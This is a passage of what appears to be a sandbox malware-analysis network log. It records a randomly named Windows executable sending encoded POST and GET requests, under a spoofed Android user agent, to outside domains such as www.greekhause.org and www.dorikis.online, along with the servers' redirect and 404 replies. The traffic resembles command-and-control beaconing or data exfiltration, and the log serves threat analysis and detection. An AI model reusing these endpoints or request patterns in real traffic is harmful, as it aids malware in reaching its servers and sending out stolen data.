                                                                                  30192.168.11.20497863.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:50.861761093 CEST816OUTPOST /phvf/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Origin: http://www.greekhause.org
                                                                                  Referer: http://www.greekhause.org/phvf/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 72 51 58 4c 6e 58 46 45 75 59 4a 41 34 65 63 77 64 4e 2b 61 47 50 30 5a 31 4e 73 64 46 73 74 4c 52 65 64 52 63 42 44 62 38 43 72 62 41 6b 6a 75 6e 42 7a 79 48 36 47 6c 2f 70 62 6e 46 53 6b 4a 51 57 59 43 62 64 76 74 76 49 30 59 33 49 53 51 64 52 76 48 6b 79 62 34 78 49 49 79 79 4e 73 79 31 52 6b 46 6f 46 58 47 53 62 31 6f 63 33 66 70 6e 66 79 68 4b 75 58 6f 37 6c 41 4c 32 44 71 66 49 55 31 57 6d 46 31 74 44 36 58 5a 4a 65 38 6b 51 44 56 78 31 49 77 42 50 66 41 61 57 69 48 6f 55 55 58 63 59 6e 6d 6a 73 6b 64 51 37 57 56 78 4f 6a 69 31 55 67 3d 3d
                                                                                  Data Ascii: Xb3xI=ZqAKhjHDqXd5rQXLnXFEuYJA4ecwdN+aGP0Z1NsdFstLRedRcBDb8CrbAkjunBzyH6Gl/pbnFSkJQWYCbdvtvI0Y3ISQdRvHkyb4xIIyyNsy1RkFoFXGSb1oc3fpnfyhKuXo7lAL2DqfIU1WmF1tD6XZJe8kQDVx1IwBPfAaWiHoUUXcYnmjskdQ7WVxOji1Ug==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.11.20497873.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:53.492954969 CEST836OUTPOST /phvf/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Origin: http://www.greekhause.org
                                                                                  Referer: http://www.greekhause.org/phvf/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 35 6a 2f 4c 68 77 52 45 2f 34 4a 50 30 2b 63 77 57 74 2b 65 47 50 34 5a 31 4a 39 51 46 35 46 4c 51 2b 74 52 64 44 37 62 37 43 72 62 4c 45 6a 72 6a 42 7a 70 48 36 4c 59 2f 6f 33 6e 46 53 41 4a 51 58 49 43 61 75 58 75 39 6f 30 61 39 59 53 4f 5a 52 76 48 6b 79 62 34 78 49 4e 5a 79 4e 6b 79 31 67 55 46 70 67 36 51 65 37 31 72 62 33 66 70 30 50 79 6c 4b 75 57 2f 37 6b 4d 68 32 41 43 66 49 52 4a 57 33 30 31 75 61 4b 58 66 4e 65 39 73 63 68 4d 5a 79 34 63 76 45 50 45 78 54 42 4b 54 52 43 47 47 46 56 53 48 76 33 42 69 2f 6d 73 5a 4d 68 6a 75 4a 6f 45 4a 2b 36 6e 52 75 74 76 7a 64 4a 79 51 71 55 2f 46 55 31 30 3d
                                                                                  Data Ascii: Xb3xI=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5FLQ+tRdD7b7CrbLEjrjBzpH6LY/o3nFSAJQXICauXu9o0a9YSOZRvHkyb4xINZyNky1gUFpg6Qe71rb3fp0PylKuW/7kMh2ACfIRJW301uaKXfNe9schMZy4cvEPExTBKTRCGGFVSHv3Bi/msZMhjuJoEJ+6nRutvzdJyQqU/FU10=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.11.20497883.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:56.132637024 CEST2578OUTPOST /phvf/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Origin: http://www.greekhause.org
                                                                                  Referer: http://www.greekhause.org/phvf/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 35 6a 2f 4c 68 77 52 45 2f 34 4a 50 30 2b 63 77 57 74 2b 65 47 50 34 5a 31 4a 39 51 46 35 64 4c 51 50 4e 52 63 6b 58 62 36 43 72 62 49 45 6a 71 6a 42 79 70 48 36 53 66 2f 70 4b 63 46 55 45 4a 52 31 51 43 64 66 58 75 6b 59 30 61 7a 49 53 50 64 52 76 6f 6b 7a 32 7a 78 4a 39 5a 79 4e 6b 79 31 69 4d 46 75 31 57 51 63 37 31 6f 63 33 66 74 6e 66 79 4e 4b 75 50 4b 37 6b 49 62 33 77 69 66 49 77 35 57 6b 69 4a 75 54 4b 58 64 49 65 38 71 63 68 77 47 79 34 41 64 45 50 77 58 54 43 71 54 63 33 37 6b 5a 46 4f 49 74 55 46 76 79 32 59 34 4d 7a 44 65 50 76 56 30 32 70 54 4c 6b 36 2f 43 59 36 2b 4d 37 42 53 44 46 43 70 61 4c 79 33 7a 4f 79 55 73 47 4f 4e 42 68 4c 62 6d 4c 33 31 4b 31 51 42 38 4f 72 6e 4c 53 42 2b 48 42 38 52 6e 46 46 61 61 73 54 72 66 50 38 66 32 4d 4c 4d 57 7a 45 79 4f 79 66 76 63 66 5a 2f 46 6a 59 4e 4e 67 66 72 6e 74 4f 5a 43 72 69 62 4d 42 62 71 31 50 4d 34 37 42 34 47 6d 65 51 70 30 5a 47 4c 33 6f 79 35 79 61 58 4e 31 6b 58 70 6b 45 41 31 4f [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5dLQPNRckXb6CrbIEjqjBypH6Sf/pKcFUEJR1QCdfXukY0azISPdRvokz2zxJ9ZyNky1iMFu1WQc71oc3ftnfyNKuPK7kIb3wifIw5WkiJuTKXdIe8qchwGy4AdEPwXTCqTc37kZFOItUFvy2Y4MzDePvV02pTLk6/CY6+M7BSDFCpaLy3zOyUsGONBhLbmL31K1QB8OrnLSB+HB8RnFFaasTrfP8f2MLMWzEyOyfvcfZ/FjYNNgfrntOZCribMBbq1PM47B4GmeQp0ZGL3oy5yaXN1kXpkEA1OOlmitVwWHvmaJAVRZvnSNOxBHDHsxnlEO257vRGubM7GjRZ42HwWn2pt64zlx64P5v7flDAk09YOWsXJwP6sdmsy31E3bm7e1R/n7GRHrPQr//xJf7d1zTmDxm5h/sPyXq5K0Omns47EixUnJKX3JAemqUfISWOGhXgJ5TtAqv8jbRyUKzHRhUdN8HRZT2Vc1u5ki//mtisMTv7fUU5ouwUOniIy9pxsksV2rQQ2UvsZDXErautIEMBPWtCO0UAzQJ5d/YmsqKBbo7T+hoU5J+5DHeIpEiVPLPFZvDL3w7Zazr+wpfTfTIXAoc9c+8syyfLkIXt6AU7yIwmdpt2hyeyejVA3VCkzB8ZPK5RcSREEOvX+aHGLv0Xeqk8N3rBA1IYWy8brq4Yavsmoc7A+4bVFuxF1XKFN3MJLxzvWEmdDXS45sMqgT/sAQYm4x/T5tsMHj29EAHfaz4zWhUWPduz9CoczxTnTKNAPwfYD9jeWfqrDxRt0iD//AfydCgrYmpcMCPUOyt1JhgHE1T66f2el5l22jc36Umcn7DYnq15Cmf4iw3Sfq0PWluZwpqTK6rq43fJIa/ks8y3cmOAdOofzpBTaRz3sjvafhJXgnUf9QnrXEpwnOc1WBzx0ekQUMYkEG490ZA0LkLLQmtMOB/jfb4bpyDD/kU [TRUNCATED]
                                                                                  Sep 25, 2024 09:56:56.132704020 CEST5407OUTData Raw: 5a 37 67 51 78 6b 54 57 38 55 2b 79 65 59 45 5a 58 36 39 48 69 45 52 45 53 46 57 51 2f 52 2f 79 4f 6a 56 6e 76 55 76 76 37 74 31 7a 69 57 67 32 4b 39 4e 46 61 4a 54 4a 32 33 33 57 44 69 48 6c 34 69 4a 42 4e 46 4d 49 38 70 62 47 78 6f 2b 52 37 64
                                                                                  Data Ascii: Z7gQxkTW8U+yeYEZX69HiERESFWQ/R/yOjVnvUvv7t1ziWg2K9NFaJTJ233WDiHl4iJBNFMI8pbGxo+R7dKcdE9Jn+/0z/MgjDJ2BhkLZdpPGxLrSL+Tnj4xIMM6dLYF3EpIznJotHC+OJo/MlBSzJ6igaxM/7pi2wUNfg7MEjtZtFjI/0SZOcc3jZ8kyjD+GDqDuYqKmxrDASd2qsEGQ1rebqvbJyYbta3BiMj6ZfjxgMjEddX


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.11.20497893.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:58.770258904 CEST548OUTGET /phvf/?O4bP=9dRH6ZfHbJX&Xb3xI=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:56:59.781140089 CEST398INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:56:59 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4f 34 62 50 3d 39 64 52 48 36 5a 66 48 62 4a 58 26 58 62 33 78 49 3d 55 6f 6f 71 69 55 2b 75 69 58 52 70 68 6c 65 78 78 69 68 59 38 2b 70 52 32 70 31 71 53 61 43 47 52 73 4d 69 67 74 34 4d 47 70 41 2f 56 4b 56 79 58 6b 4c 38 71 79 65 69 66 56 57 49 31 51 66 39 49 62 4b 6a 6a 61 54 2b 4e 42 34 30 45 48 49 31 63 73 4f 77 38 62 45 48 38 72 76 35 58 67 50 70 73 48 69 6c 32 4a 34 77 35 4d 4a 4f 77 67 70 41 74 31 62 43 52 76 30 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?O4bP=9dRH6ZfHbJX&Xb3xI=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0="}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.11.2049790162.213.249.216803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:05.367739916 CEST816OUTPOST /d84b/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dorikis.online
                                                                                  Origin: http://www.dorikis.online
                                                                                  Referer: http://www.dorikis.online/d84b/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 36 68 50 34 43 49 6d 57 44 75 6e 79 47 71 30 4d 74 4c 6a 35 72 34 39 4e 49 45 76 78 59 36 2b 70 70 44 4a 37 45 78 32 30 43 39 55 55 62 71 46 76 4f 76 73 42 52 54 45 51 44 64 53 45 5a 46 61 42 41 4d 78 71 2b 59 4b 4d 42 43 53 68 67 50 6f 46 6a 41 46 59 47 69 50 76 59 6b 4d 54 30 46 7a 70 79 45 58 74 39 6c 31 76 48 56 34 79 63 59 73 72 50 47 4f 4e 71 68 74 77 43 37 46 50 31 41 79 76 36 48 65 53 68 71 35 37 41 61 39 30 7a 4f 44 67 76 38 43 35 70 51 67 51 68 65 32 63 38 4e 32 2f 6a 6f 46 6d 43 64 68 42 30 51 64 71 65 6a 38 57 77 48 54 72 5a 77 3d 3d
                                                                                  Data Ascii: Xb3xI=GBk3MDGQZQHC6hP4CImWDunyGq0MtLj5r49NIEvxY6+ppDJ7Ex20C9UUbqFvOvsBRTEQDdSEZFaBAMxq+YKMBCShgPoFjAFYGiPvYkMT0FzpyEXt9l1vHV4ycYsrPGONqhtwC7FP1Ayv6HeShq57Aa90zODgv8C5pQgQhe2c8N2/joFmCdhB0Qdqej8WwHTrZw==
                                                                                  Sep 25, 2024 09:57:05.688828945 CEST595INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 25 Sep 2024 07:57:05 GMT
                                                                                  Server: Apache
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  Content-Length: 389
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.11.2049791162.213.249.216803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:08.200606108 CEST836OUTPOST /d84b/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dorikis.online
                                                                                  Origin: http://www.dorikis.online
                                                                                  Referer: http://www.dorikis.online/d84b/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 34 42 66 34 42 72 65 57 53 2b 6e 31 4a 4b 30 4d 36 62 6a 39 72 34 78 4e 49 47 44 62 59 50 4f 70 6e 43 35 37 46 7a 53 30 48 39 55 55 50 61 46 6d 52 66 73 61 52 54 35 74 44 66 57 45 5a 46 4f 42 41 49 31 71 2b 70 4b 4e 54 69 54 48 31 66 6f 44 74 67 46 59 47 69 50 76 59 6e 77 35 30 46 4c 70 7a 31 6e 74 73 77 56 6f 4c 31 34 31 62 59 73 72 4c 47 4f 42 71 68 73 56 43 35 78 70 31 43 61 76 36 46 47 53 68 62 35 38 4f 61 38 39 2f 65 44 77 69 63 62 56 6f 54 6f 74 77 4f 33 50 36 2b 71 57 6d 2b 55 38 66 76 56 6c 33 44 42 59 61 54 46 2b 79 46 53 77 45 37 2b 58 4f 43 78 65 2b 44 68 66 53 63 4e 38 73 64 59 53 41 72 49 3d
                                                                                  Data Ascii: Xb3xI=GBk3MDGQZQHC4Bf4BreWS+n1JK0M6bj9r4xNIGDbYPOpnC57FzS0H9UUPaFmRfsaRT5tDfWEZFOBAI1q+pKNTiTH1foDtgFYGiPvYnw50FLpz1ntswVoL141bYsrLGOBqhsVC5xp1Cav6FGShb58Oa89/eDwicbVoTotwO3P6+qWm+U8fvVl3DBYaTF+yFSwE7+XOCxe+DhfScN8sdYSArI=
                                                                                  Sep 25, 2024 09:57:08.510865927 CEST595INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 25 Sep 2024 07:57:08 GMT
                                                                                  Server: Apache
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  Content-Length: 389
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  36192.168.11.2049792162.213.249.216803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:11.020149946 CEST2578OUTPOST /d84b/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dorikis.online
                                                                                  Origin: http://www.dorikis.online
                                                                                  Referer: http://www.dorikis.online/d84b/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 34 42 66 34 42 72 65 57 53 2b 6e 31 4a 4b 30 4d 36 62 6a 39 72 34 78 4e 49 47 44 62 59 50 47 70 6e 30 74 37 46 54 75 30 41 39 55 55 4d 61 46 72 52 66 73 62 52 54 68 70 44 66 4c 78 5a 47 32 42 61 74 68 71 34 62 75 4e 5a 69 54 48 33 66 6f 47 6a 41 46 33 47 6b 76 72 59 6b 59 35 30 46 4c 70 7a 32 2f 74 38 56 31 6f 4e 31 34 79 63 59 73 76 50 47 4f 6c 71 68 31 6f 43 36 64 66 31 79 36 76 35 6c 57 53 79 4e 74 38 43 61 38 2f 2b 75 43 76 69 63 6e 4b 6f 54 45 62 77 4f 43 53 36 39 4b 57 6e 76 39 2f 4b 74 68 4f 75 54 5a 52 46 41 35 63 6b 45 71 53 4c 4a 4b 4b 4b 78 6f 72 32 56 6c 64 54 75 5a 4c 34 38 55 61 44 50 4c 52 76 71 4f 50 51 5a 39 4f 73 54 73 2b 64 72 32 4f 6f 45 57 70 6f 4f 39 55 34 70 4c 43 74 74 47 58 6b 32 4a 37 77 75 44 33 66 4a 67 77 66 6a 43 48 6a 37 71 4a 48 31 42 79 6b 69 6d 77 34 37 63 4d 65 49 72 76 71 76 4a 4f 6b 48 4f 52 5a 45 72 35 31 30 6d 42 38 30 37 6e 77 56 4d 57 71 76 33 49 4c 63 46 6b 53 7a 65 4e 4e 79 53 6f 39 53 74 39 33 30 75 4a [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=GBk3MDGQZQHC4Bf4BreWS+n1JK0M6bj9r4xNIGDbYPGpn0t7FTu0A9UUMaFrRfsbRThpDfLxZG2Bathq4buNZiTH3foGjAF3GkvrYkY50FLpz2/t8V1oN14ycYsvPGOlqh1oC6df1y6v5lWSyNt8Ca8/+uCvicnKoTEbwOCS69KWnv9/KthOuTZRFA5ckEqSLJKKKxor2VldTuZL48UaDPLRvqOPQZ9OsTs+dr2OoEWpoO9U4pLCttGXk2J7wuD3fJgwfjCHj7qJH1Bykimw47cMeIrvqvJOkHORZEr510mB807nwVMWqv3ILcFkSzeNNySo9St930uJEZkP5MxUYmDGtVBRKq5pS23LdUyvioCmtFk/NwkDkm71qzOjV1bX0X02hA0FBCHGnmdCp7Cg7dMdhOKbPkgJVXjsmhD5ehh43Ojvl7fLnVsvxUtlzeZ6DPGZsYxsYyQBVYwzQcyMWJqs1kPrfYwRld99CwvoBkDeIzb+wUID09j0RPr5GghUozDF/xOTzm4XQgXPULeAqSiVBqEHhIbC7Bu99FUFiLvwb6J6WNqN5md/XZRLsXPndFM2vcTlX0d8Qt8sS4huaCRKQLayv5CeL+JDFduaC1xmxlCCSCEkzxiJkcl/qw4V2EVvzdXD47FxFKJ7cvbjB7c9FzjTBJDFvT8pFWHwa0K88Iq2J+W3gqALF/kQ9FodBTgr3GqvhLrAaRlfMDqD3t+dvg1t/s9auPWb5rvEegqCnq6tr0dZp2IO7miwWY23JTdlQTIL+7QFXZNpv2p4Vlr5YDRla+mJthG5QNOVyq3NkA74f9E3DWwDhrtOf5I7kKantFcYNjXgz57gCpbNyTmLlHtAmQv30RvEiw2ztmi6d44txEGJ9Rm7PHMP2kjyZ7poKaAHML8kQu83P14S4tDm7BZIR0q3jOj3/nFNvyg33EzdovBH2owWiG/mkZxrE0ttftTtI5gcY3Z817dJOA4aSn0dPewtyP0uMnQGgXIbXj [TRUNCATED]
                                                                                  Sep 25, 2024 09:57:11.020195007 CEST5407OUTData Raw: 4c 44 59 44 43 35 64 4b 69 6b 69 50 2f 41 2b 6e 33 4a 62 72 2f 6d 6d 62 66 55 2f 4e 39 5a 76 42 6e 37 72 76 5a 7a 49 78 59 58 44 55 61 30 30 30 4d 42 38 36 35 66 41 50 70 50 75 59 4f 54 39 38 39 49 79 62 78 39 44 6e 39 70 45 55 2f 78 6e 63 4d 2b
                                                                                  Data Ascii: LDYDC5dKikiP/A+n3Jbr/mmbfU/N9ZvBn7rvZzIxYXDUa000MB865fAPpPuYOT989Iybx9Dn9pEU/xncM+b1rAc1eAW2pwzC+vtYeyL9iiH47zyd6AsXVWBbbsGJmeDvH/zTcFMFZPoYdhQhjo06/7ndBMkokyu3uZSkDecSuGA+LlZQlGw4NUZ9rQjFelS4vSfbhcRyrEa0N0LBSIcxC0B5GO8o2O6xZno0U/qj/pxyLOJ8m18
                                                                                  Sep 25, 2024 09:57:11.328962088 CEST595INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 25 Sep 2024 07:57:11 GMT
                                                                                  Server: Apache
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  Content-Length: 389
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Connection: close
                                                                                  Content-Type: text/html
